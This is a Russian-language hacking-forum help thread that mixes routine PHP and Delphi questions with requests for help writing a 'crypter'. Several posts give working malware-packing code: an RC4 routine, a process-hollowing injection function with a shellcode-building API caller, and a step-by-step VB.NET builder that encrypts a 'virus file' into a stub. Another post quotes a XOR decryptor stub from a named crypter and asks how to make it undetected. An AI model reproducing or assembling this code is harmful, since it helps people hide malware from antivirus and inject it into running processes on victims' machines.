Помощь / Help

[darkest]

Все вопросы по source задавать здесь

[VicK]

Здравствуйте, я хочу написать криптор, никогда этим не занимался. Нашёл исходники, начал их изучать и понял, что не понял больше половины. Я понимаю, что делают отдельные разрозненные куски кода, но не понимаю зачем и что получается "на выходе". Запустить исходник в отладочном режиме не получается, т.к. имеют место быть и активно используются некие необъявленные, чей смысл мне также неясен.
Вот пример такого куска кода, может кто-нибудь просто и доходчиво (как для дурака ) объяснить, что же он делает?

Код:

      Public Function RC4(ByVal Expression As String, ByVal Password As String) As String
              On Error Resume Next
              Dim RB(255) As Short
              Dim Y, X, Z As Integer
              Dim Key() As Byte
              Dim ByteArray() As Byte
              Dim Temp As Byte
              If Len(Password) = 0 Then
                    Exit Function
              End If
              If Len(Expression) = 0 Then
                    Exit Function
              End If
              If Len(Password) > 256 Then
                    Key = System.Text.UnicodeEncoding.Unicode.GetBytes(StrConv(Left(Password, 256), vbFromUnicode))
              Else
                    Key = System.Text.UnicodeEncoding.Unicode.GetBytes(StrConv(Password, vbFromUnicode))
              End If
              For X = 0 To 255
                    RB(X) = X
              Next X
              X = 0
              Y = 0
              Z = 0
              For X = 0 To 255
                    Y = (Y + RB(X) + Key(X Mod Len(Password))) Mod 256
                    Temp = RB(X)
                    RB(X) = RB(Y)
                    RB(Y) = Temp
              Next X
              X = 0
              Y = 0
              Z = 0
              ByteArray = System.Text.UnicodeEncoding.Unicode.GetBytes(StrConv(Expression, vbFromUnicode))
              For X = 0 To Len(Expression)
                    Y = (Y + 1) Mod 256
                    Z = (Z + RB(Y)) Mod 256
                    Temp = RB(Y)
                    RB(Y) = RB(Z)
                    RB(Z) = Temp
                    ByteArray(X) = ByteArray(X) Xor (RB((RB(Y) + RB(Z)) Mod 256))
              Next X
              RC4 = StrConv(System.Text.UnicodeEncoding.Unicode.GetString(ByteArray), vbUnicode)
        End Function

[Apocalypse]

Шифрует строку по алгоритму RC4

[VicK]

Благодарю А эти?

Код:

Private Function CallAPI(ByVal sLib As String, ByVal sMod As String, ParamArray ByVal Params() As Object) As Integer
        Dim lPtr As Integer
        Dim bvASM(&HEC00 - 1) As Byte
        Dim i As Integer
        Dim lMod As Integer
        
        lMod = GetProcAddress(LoadLibraryA(sLib), sMod)
        If lMod = 0 Then Exit Function
        lPtr = VarPtr(bvASM(0))
        RtlMoveMemory(lPtr, &H59595958, &H4) : lPtr = lPtr + 4
        RtlMoveMemory(lPtr, &H5059, &H2) : lPtr = lPtr + 2
        For i = UBound(Params) To 0 Step -1
            RtlMoveMemory(lPtr, &H68, &H1) : lPtr = lPtr + 1
            RtlMoveMemory(lPtr, CInt(Params(i)), &H4) : lPtr = lPtr + 4
        Next 
        RtlMoveMemory(lPtr, &HE8, &H1) : lPtr = lPtr + 1
        RtlMoveMemory(lPtr, lMod - lPtr - 4, &H4) : lPtr = lPtr + 4
        RtlMoveMemory(lPtr, &HC3, &H1) : lPtr = lPtr + 1
        CallAPI = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)
    End Function

Код:

    Sub Injec(ByVal sHost As String, ByRef bvBuff() As Byte, ByRef parameter As String)
        Dim i As Integer
        Dim Pidh As IMAGE_DOS_HEADER
        Dim Pinh As IMAGE_NT_HEADERS
        Dim Pish As IMAGE_SECTION_HEADER
        Dim Si As STARTUPINFO
        Dim Pi As PROCESS_INFORMATION
        Dim Ctx As CONTEXT
        
        Si.cb = Len(Si)
        
        RtlMoveMemory(Pidh, bvBuff(0), 64)
        RtlMoveMemory(Pinh, bvBuff(Pidh.e_lfanew), 248)
        
        CreateProcessA(sHost, " " & parameter, 0, 0, False, CREATE_SUSPENDED, 0, 0, Si, Pi)
        CallAPI("ntdll", "NtUnmapViewOfSection", Pi.hProcess, Pinh.OptionalHeader.ImageBase)
        CallAPI("kernel32", "VirtualAllocEx", Pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
        WriteProcessMemory(Pi.hProcess, Pinh.OptionalHeader.ImageBase, bvBuff(0), Pinh.OptionalHeader.SizeOfHeaders, 0)
        
        For i = 0 To Pinh.FileHeader.NumberOfSections - 1
            RtlMoveMemory(Pish, bvBuff(Pidh.e_lfanew + 248 + 40 * i), Len(Pish))
            WriteProcessMemory(Pi.hProcess, Pinh.OptionalHeader.ImageBase + Pish.VirtualAddress, bvBuff(Pish.PointerToRawData), Pish.SizeOfRawData, 0)
        Next i
        
        Ctx.ContextFlags = CONTEXT_FULL
        CallAPI("kernel32", "GetThreadContext", Pi.hThread, VarPtr(Ctx))
        WriteProcessMemory(Pi.hProcess, Ctx.Ebx + 8, Pinh.OptionalHeader.ImageBase, 4, 0)
        Ctx.Eax = Pinh.OptionalHeader.ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
        CallAPI("kernel32", "SetThreadContext", Pi.hThread, VarPtr(Ctx))
        CallAPI("kernel32", "ResumeThread", Pi.hThread)
    End Sub

[hz_kto_ya]

Vick почитай матчасть что ли. Все же черным по белому написано:
Function CallAPI - функция для вызова api-шек из определенной либы с определенными параметрами.
Injec(*Inject) - собственно инжект кода в определенный процесс.

Если ты задаешь такие вопросы, то тебе еще рановато за криптор браться. Обуздай книжечку по VB, почитай статьи по написанию на VB, поучи хоть немного английский и все будет норма.

[Security2431]

Подскажите на руби вирус можна написать?

[by_dmr]

Security2431, Ну ты извращенец, наврятли у тебя чтото получиться, возьми курс в сторону питона, делфи, приплюснотого...

[Dave]

Нужна помощь!

Программа. Запускаешь ее из под юзера, на машине без админских прав. Заведомо известен пароль и логин админа. Она считывает из своих параметров этот логин и пасс. И делает запуск редактора реестра от имени этого администратора.Точнее ищет в реестре определенный ключик и удаляет его. Все. Автоматом завершаем.

[herm1t]

Цитата:

Сообщение от Dave

Нужна помощь!

Программа. Запускаешь ее из под юзера, на машине без админских прав. Заведомо известен пароль и логин админа. Она считывает из своих параметров этот логин и пасс. И делает запуск редактора реестра от имени этого администратора.Точнее ищет в реестре определенный ключик и удаляет его. Все. Автоматом завершаем.

[Ссылки могут видеть только зарегистрированные пользователи.]

[Dave]

herm1t, ничего не понятно ((( Хуево, когда не помнишь, да еще и не знаешь....

[vazonez]

А я тебе чо писал то! Хуйли непонятного? Вставляй и канпелируй.

[Dave]

Цитата:

Сообщение от vazonez

А я тебе чо писал то!

Тупой я в кодинге.

[Dave]

В общем нужно типа такого:

Форма. На ней 2 баттона.
На первый нажимаешь ---> удаляет запись в реестре. В разделе HKLM.
На второй ---> запускает от имени админа удаленный рабочий стол и подключается к адресу: 192.138.3.102. Закрывает подключение после удачного подключения.

Компьютер в домене. Логин и пасс админа известен.

[POCT]

хз, может я тебя не правильно понял, но посмотри:

[Ссылки могут видеть только зарегистрированные пользователи.]

[Ссылки могут видеть только зарегистрированные пользователи.]

это сама тема:
[Ссылки могут видеть только зарегистрированные пользователи.]

[Deymos]

НароД, подскажите по php.
В общем нужно организовать алгоритм.

Есть Три поля, в них вопросы. После того как пользователь ответил на них у него появляется ответ.

Объясняю на примере.

Что вы пьете: Пиво, Водка, Коньяк
Чем закусываете: Огурцы, сосиска, хлеб
Куда хотите отправиться: США, Канада, Россия

Если пользователь выбрал: Пиво, Огурцы, Россия, ему выдается сообщение : "Хорошо".
Если пользователь выбрал:Водка, хлеб, Сша, ему выдается плохо. Ну и т.п. различные комбинации. Скажите как реализовать на php

[by_dmr]

Deymos,

Код:

<?php

if (empty($_POST['q1']) or empty($_POST['q2']) or empty($_POST['q3']))
{
echo "
<html>
<title>Ответьте на вопросы</title>
<body>
<form method=POST>
<br><b>Что вы пьете:</b>
<input type=radio name=q1 value='pivo' checked> Пиво
<input type=radio name=q1 value='vodka'> Водка
<input type=radio name=q1 value='konyak'> Коньяк
<br><b>Чем закусываете:</b>
<input type=radio name=q2 value='ogyrec' checked> Огурцы
<input type=radio name=q2 value='sosiska'> сосиска
<input type=radio name=q2 value='hleb'> хлеб
<br><b>Куда хотите отправиться:</b>
<input type=radio name=q3 value='us' checked> США
<input type=radio name=q3 value='ca'> Канада
<input type=radio name=q3 value='ru'> Россия
<br><input type=submit value='send'>
</form>
</body>
</html>
";}
else 
{
if ($_POST['q1'] ="pivo" and $_POST['q2']="ogyrec"  and $_POST['q3']="ru") {echo "Хорошо";}
else {echo "Плохо";}
}

?>

Не Тестил!

[Deymos]

by_dmr,только у тебя немного не работает ))) у тебя все хорошо, плохо вообще не бывает

[Morgot]

Deymos, такой вопрос, а обязательно на пхп? Просто это можно реализовать и на яваскрипт, будет также работать в браузере, и не надо обращения к серверу.

Цитата:

by_dmr,только у тебя немного не работает ))) у тебя все хорошо, плохо вообще не бывает

там есть маленькая ошибка, стандартная для сишных языков.
В строке
if ($_POST['q1'] ="pivo" and $_POST['q2']="ogyrec" and $_POST['q3']="ru")

Замените все "=" на "==". Ибо в Си "=" - значит присваивание, а проверка - "==".

[Deymos]

Morgot,спасибо, можно хоть на чем. Задание у меня на работе сделать такую фигню, а я не компитентен

[POCT]

Это почитай:

[Ссылки могут видеть только зарегистрированные пользователи.]

[Ссылки могут видеть только зарегистрированные пользователи.]

Остается только собрать воедино.

[Deymos]

by_dmr,ты ваще красавчик, все правильно, щас уже поздно, завтра буду разбираться...
POCT,почитаю, спс, а то гуглил - не знал как это правильно ввести

[leh12]

Судя по 1 посту тут требуется помощь вкрипторе..Судя по коду там у тя шифрование в RC4 .-Функция написанная на ВБ-6
1 Если ты изучаешь этот язык то возможно она тебе пригодится.
2 Тагже есть куча методов шифрования (Блоуфиш или исор и тд ) но РЦ4 более Лоялен к приложениям которые ты будешь криптовать.
3 Я покажу основу на VB>NET
Делаем форму .Далее 1 текстбокс и 2 Буттон ( кнопки)
Далее кликаем по форме 2 раза и видим следующие
Public Class Form1
Выше етой строки прописываем
Imports System.Text' это импортируем необходимые нам для работы свойства
Жалее следующее...
Public Class Form1
Const filesplit = "@жопановыйгод@" ' это константа она же ключ для шифра и дешифра
Кликаем по 1 кнопки (обзываем ее ОБЗОР)- 2 раза
With OpenFileDialog1
.FileName = ""
.Filter = "Exelcutable(*.exe)|*.exe*"
.ShowDialog()
TextBox1.Text = .FileName
End With
Кликаем по 2 кнопке ( тагже как и по первой
Dim filein, filename, stub As String
Dim lol As New SaveFileDialog
If lol.ShowDialog = Windows.Forms.DialogResult.OK Then
filename = lol.FileName
Else : Exit Sub
End If
FileOpen(1, TextBox1.Text, OpenMode.Binary, OpenAccess.Read, OpenShare.Defkt;bn' здесь открываем ВирусФайл в Бинарном Коде
filein = Space(LOF(1))
FileGet(1, filein)
FileClose(1)
FileOpen(1, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)' здесь открываем файл СТАБ который рядом лежит
stub = Space(LOF(1))
FileGet(1, stub)
FileClose(1)
FileOpen(1, filename, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(1, stub & filesplit & rc4(filein, "жопановыйгод"))
FileClose(1)

MsgBox("СДЕЛАНО!")
Me.Close()
Вот впринципе и все ..Осталось забить код шифрования в коком мы хотим
Вот и он
Public Shared Function rc4(ByVal message As String, ByVal password As String) As String
Dim i As Integer = 0
Dim j As Integer = 0
Dim cipher As New StringBuilder
Dim returnCipher As String = String.Empty
Dim sbox As Integer() = New Integer(256) {}
Dim key As Integer() = New Integer(256) {}
Dim intLength As Integer = password.Length
Dim a As Integer = 0
While a <= 255
Dim ctmp As Char = (password.Substring((a Mod intLength), 1).ToCharArray()(0))
key(a) = Microsoft.VisualBasic.Strings.Asc(ctmp)
sbox(a) = a
System.Math.Max(System.Threading.Interlocked.Incre ment(a), a - 1)
End While
Dim x As Integer = 0
Dim b As Integer = 0
While b <= 255
x = (x + sbox(b) + key(b)) Mod 256
Dim tempSwap As Integer = sbox(b)
sbox(b) = sbox(x)
sbox(x) = tempSwap
System.Math.Max(System.Threading.Interlocked.Incre ment(b), b - 1)
End While
a = 1
While a <= message.Length
Dim itmp As Integer = 0
i = (i + 1) Mod 256
j = (j + sbox(i)) Mod 256
itmp = sbox(i)
sbox(i) = sbox(j)
sbox(j) = itmp
Dim k As Integer = sbox((sbox(i) + sbox(j)) Mod 256)
Dim ctmp As Char = message.Substring(a - 1, 1).ToCharArray()(0)
itmp = Asc(ctmp)
Dim cipherby As Integer = itmp Xor k
cipher.Append(Chr(cipherby))
System.Math.Max(System.Threading.Interlocked.Incre ment(a), a - 1)
End While
returnCipher = cipher.ToString
cipher.Length = 0
Return returnCipher
End Function
Все С этим разобрались ....Да я не писал здесь (Когда 2 раза кликните по кнопке У тебя автоматом появится код деклорации Типо)
Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click

Сюда пихаем мой код и заканчиваться должно строкой ниже
End Sub
----------------
Теперь нужно сделать СТАБ..- это отдельный проект Создаем
Если будет интересно опишу в следущий раз.
Все написано на VB.net студии 2010
Скачать ее можно с инета Официально или как ..захочишь..
Видос (Примерно можно почерпнуть как сделать форму) [Ссылки могут видеть только зарегистрированные пользователи.]

[by_dmr]

Сорри, я просто когдато давно выучил php, причем знал его довольно хорошо,
И в процессе развития начал я учить Delphi, и позабыл синтаксис ПыхПыха

[dokzlo13]

Привет, нужно реализовать такую штуку.


Когда мы запускаем программу, она должна проверить наличие строки, предположим "12345", в определенном текстовом файле, и если эта строка отсутствует, записать ее, если эта строка уже существует то ничего не нужно.

не знаю как еще обьяснить


Delphi?

[by_dmr]

Цитата:

Сообщение от dokzlo13

нем мы записали определенные строки, необходимо проверить их наличие, и если и

Док, запиши ТЗ чуть пограмотней

[dokzlo13]

by_dmr, пофиксил

[WestSide]

Цитата:

Сообщение от dokzlo13

Когда мы запускаем программу, она должна проверить наличие строки, предположим "12345", в определенном текстовом файле, и если эта строка отсутствует, записать ее, если эта строка уже существует то ничего не нужно.

Один хер ничего не понятно. Что представляет из себя файл? Что в нем? Много строк? Одна?

Можно как то так

Код:

// быдло функция написанная на скорость
function CheckText(text:String):Boolean;
var 
  i: Integer;
begin
for i:=0 to Memo1.Count-1 do
begin
If Memo1.Lines[i]=text
then
begin
Result:=True;
break;
end
else
begin
Result:=False;
end;
end;
end;

Memo1.LoadFromFile('File.txt');
If CheckText('текст')=False
then
begin
Memo1.Lines.Add('текст');
Memo1.SaveToFile('File.txt');
end;

Поидее должно работать, но я не тестил. )

[Apathy]

в разделе сурсы 95% дельфи, есить ли люди кодящие на c++???
и могут ли они тоже выкладывать сурсы:?

[O'NeiLL]

Нашёл в сети Vegan-Crypter и решил почистить его. Стаба у него как отдельного файла нет, зато в биндере есть вот такая строчка:

Код:

stub := 'B9SSSSSSSS3680310E4181F9LLLLLLLL75F3E9JJJJJJJJ';

в асме это выглядит так:

Код:

00401945 >  B9 XXXXXXXX     MOV ECX,XXXXXXXX
     0040194B    36:8031 0E      XOR BYTE PTR SS:[ECX],0E
     0040194F    41              INC ECX
     00401950    81F9 XXXXXXXX   CMP ECX,XXXXXXXX
     00401956  ^ 75 F3           JNZ SHORT 0040194B
     00401958  ^ E9 XXXXXXXX     JMP XXXXXXXX

по коду видно что задаётся массив и к каждому его элементу применяется XOR, но вот почистить такое чудо я не знаю, какие идеи есть?

[1nf3c7ed]

У кого есть простой сорс криптора с лоадером? поделитесь